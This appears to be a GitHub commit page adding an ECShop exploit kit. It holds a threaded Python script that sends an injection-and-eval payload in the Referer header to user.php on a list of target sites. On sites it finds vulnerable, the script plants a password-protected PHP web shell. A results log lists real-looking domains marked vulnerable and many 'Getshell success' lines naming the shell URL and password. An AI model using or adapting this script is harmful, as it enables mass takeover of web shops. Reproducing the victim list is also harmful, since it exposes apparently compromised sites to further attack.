Skip to content

Commit ab9b8a3

Browse files
jiushilljiushill
authored
Add files via upload
1 parent bd51740 commit ab9b8a3

4 files changed

Lines changed: 690 additions & 0 deletions

File tree

ECShop-exploit/eschop-exp.py

Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
import requests
2+
import threading
3+
import os
4+
import re
5+
import time
6+
7+
xj=open('save.txt','w')
8+
xj.close()
9+
10+
cz=[]
11+
def exploit(url):
12+
url=url+'/user.php'
13+
header={'Referer': '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'}
14+
data={'action':'login','vulnspy':'phpinfo();exit;'}
15+
try:
16+
reqt=requests.post(url=url,headers=header,data=data,timeout=10)
17+
if 'PHP Version' in reqt.text:
18+
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url))
19+
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url),file=open('save.txt','a'))
20+
cz.append(reqt.url)
21+
else:
22+
print('[-] Not debug url:{}'.format(reqt.url))
23+
except Exception as g:
24+
print('[-] Error {}'.format(g))
25+
26+
if len(cz)>0:
27+
print('[+] start getshell')
28+
else:
29+
print('[-] not debug,Unable to getshell')
30+
exit()
31+
32+
33+
getshellpayloads={'action':'login','vulnspy':'eval(base64_decode($_POST[d]));exit;','d':'ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8+Jyk7'}
34+
35+
for t in cz:
36+
tx=re.sub('/user.php','',str(t))
37+
try:
38+
reqts2=requests.post(url=t,headers=header,data=getshellpayloads)
39+
reqts3=requests.post(url=tx+'/vulnspy.php?vulnspy=phpinfo();')
40+
if 'PHP Version' in reqts3.text:
41+
print('[+] Getshell success url:{} password:{}'.format(reqts3.url, 'vulnspy'))
42+
print('[+] Getshell success url:{} password:{}'.format(reqts3.url,'vulnspy'),file=open('save.txt','a'))
43+
else:
44+
print('[-] Getshell failure url:{}'.format(reqts3.url))
45+
except Exception as p:
46+
print('[-] Error {}'.format(p))
47+
if __name__ == '__main__':
48+
user = input('file:')
49+
if os.path.exists(user):
50+
print('[+] file {} ok'.format(user))
51+
else:
52+
print('[-] not file {}'.format(user))
53+
exit()
54+
55+
dk=open('{}'.format(user),'r')
56+
for d in dk.readlines():
57+
qc="".join(d.split('\n'))
58+
t=threading.Thread(target=exploit,args=(qc.rstrip('/'),))
59+
t.start()

ECShop-exploit/qcf.py

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
qclist=[]
2+
xj=open('qc.txt','w')
3+
xj.close()
4+
5+
dk=open('save.txt','r')
6+
for v in dk.readlines():
7+
qc="".join(v.split('\n'))
8+
qclist.append(qc)
9+
10+
jd=list(set(qclist))
11+
print('[+] Remove duplication')
12+
for j in jd:
13+
print(j)
14+
print(j,file=open('qc.txt','a'))

ECShop-exploit/save.txt

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
[+] Remote code execution high-risk vulnerabilities url:https://tukuge.com/user.php
2+
[+] Remote code execution high-risk vulnerabilities url:http://ec19.138z.cn/user.php
3+
[+] Remote code execution high-risk vulnerabilities url:http://ec107.138z.cn/user.php
4+
[+] Remote code execution high-risk vulnerabilities url:http://www.chishiba.com/user.php
5+
[+] Remote code execution high-risk vulnerabilities url:http://www.37yw.cn/user.php
6+
[+] Remote code execution high-risk vulnerabilities url:http://www.artchina100.com/user.php
7+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
8+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
9+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
10+
[+] Remote code execution high-risk vulnerabilities url:http://ec85.138z.cn/user.php
11+
[+] Remote code execution high-risk vulnerabilities url:http://mx006.cn/user.php
12+
[+] Remote code execution high-risk vulnerabilities url:http://gegezhubao.com/user.php
13+
[+] Remote code execution high-risk vulnerabilities url:http://ec60.138z.cn/user.php
14+
[+] Remote code execution high-risk vulnerabilities url:http://shopex.10366.com/user.php
15+
[+] Remote code execution high-risk vulnerabilities url:http://www.klmy.net.cn/user.php
16+
[+] Remote code execution high-risk vulnerabilities url:http://gaoduanmao.com/user.php
17+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
18+
[+] Remote code execution high-risk vulnerabilities url:http://ec6.138z.cn/user.php
19+
[+] Remote code execution high-risk vulnerabilities url:http://tx.vkuke.com/user.php
20+
[+] Remote code execution high-risk vulnerabilities url:http://ec3.138z.cn/user.php
21+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
22+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
23+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
24+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
25+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
26+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
27+
[+] Getshell success url:https://tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
28+
[+] Remote code execution high-risk vulnerabilities url:http://www.029cup.com/user.php
29+
[+] Remote code execution high-risk vulnerabilities url:http://ec43.138z.cn/user.php
30+
[+] Remote code execution high-risk vulnerabilities url:https://www.tukuge.com/user.php
31+
[+] Getshell success url:http://mx006.cn/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
32+
[+] Getshell success url:http://mx006.cn/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
33+
[+] Getshell success url:http://ec43.138z.cn/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
34+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
35+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
36+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
37+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
38+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
39+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
40+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
41+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
42+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
43+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
44+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
45+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
46+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
47+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
48+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
49+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
50+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy
51+
[+] Getshell success url:https://www.tukuge.com/vulnspy.php?vulnspy=phpinfo(); password:vulnspy

0 commit comments

Comments
 (0)